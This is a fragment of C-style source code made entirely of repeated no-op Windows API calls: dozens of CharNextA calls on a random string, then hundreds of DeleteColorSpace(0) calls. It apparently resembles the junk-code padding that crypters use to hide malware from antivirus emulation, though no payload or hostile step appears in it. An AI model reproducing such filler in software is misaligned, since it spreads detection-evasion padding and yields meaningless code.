				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
				DeleteColorSpace(0);
